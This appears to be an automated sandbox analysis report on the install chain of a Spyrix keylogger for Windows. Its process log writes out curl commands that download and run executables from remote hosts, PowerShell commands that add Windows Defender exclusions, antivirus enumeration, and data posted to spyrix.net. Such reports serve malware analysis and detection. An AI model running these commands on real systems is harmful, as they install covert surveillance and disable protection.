Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0040AC68 FindFirstFileW,FindClose,	56_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	56_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033775E8 FindFirstFileA,	56_2_033775E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033776C4 FindFirstFileA,GetLastError,	56_2_033776C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_033760F2 GetSystemInfo,

56_2_033760F2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

Source: spkl.exe, 00000038.00000002.2726762987.000000000176E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
Source: spmm.exe, 0000004D.00000002.2674132311.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volum
Source: svchost.exe, 00000008.00000002.2690358497.0000027405654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2679298985.000002740002B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: curl.exe, 0000000E.00000003.1613409560.0000000002D40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613488405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: spmm.exe, 0000004D.00000002.2674132311.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: NETSTAT.EXE, 00000043.00000002.2458572520.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: [space]= .exe, 00000007.00000002.1804315913.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867265165.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2582806090.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607715757.0000000001698000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615599074.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, spmm.exe, 0000004D.00000002.2674132311.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658435418.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: spkl.exe, 00000038.00000002.2691175840.0000000001484000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: @@IdPORT_vmnet
Source: curl.exe, 00000006.00000003.1548833142.000001CE89185000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Contains functionality for execution timing, often used to detect debuggers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_0339B8B0 rdtsc

56_2_0339B8B0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_0036119B SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,

71_2_0036119B

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

Uses taskkill to terminate processes

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F

Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager02 00:13:12.87
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AC6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},tch:1;
Source: spkl.exe, 00000038.00000002.2726762987.000000000176E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:12.877ge
Source: spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: sTitle":"Program Manager","sUser":"user"}]}
Source: spkl.exe, 00000038.00000003.2640892122.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000038.00000002.2753080685.0000000007646000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: spkl.exe, 00000038.00000002.2691175840.0000000000A84000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: @@DOF_PROGMAN
Source: spkl.exe, 00000038.00000003.2640368617.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661261150.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: I2024-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000038.00000002.2726418979.0000000001755000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661261150.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +2024-10-02 00:13:12.877{"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2753080685.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;userd"
Source: spkl.exe, 00000038.00000002.2746048085.0000000004F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:13:12.877{"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}31"}
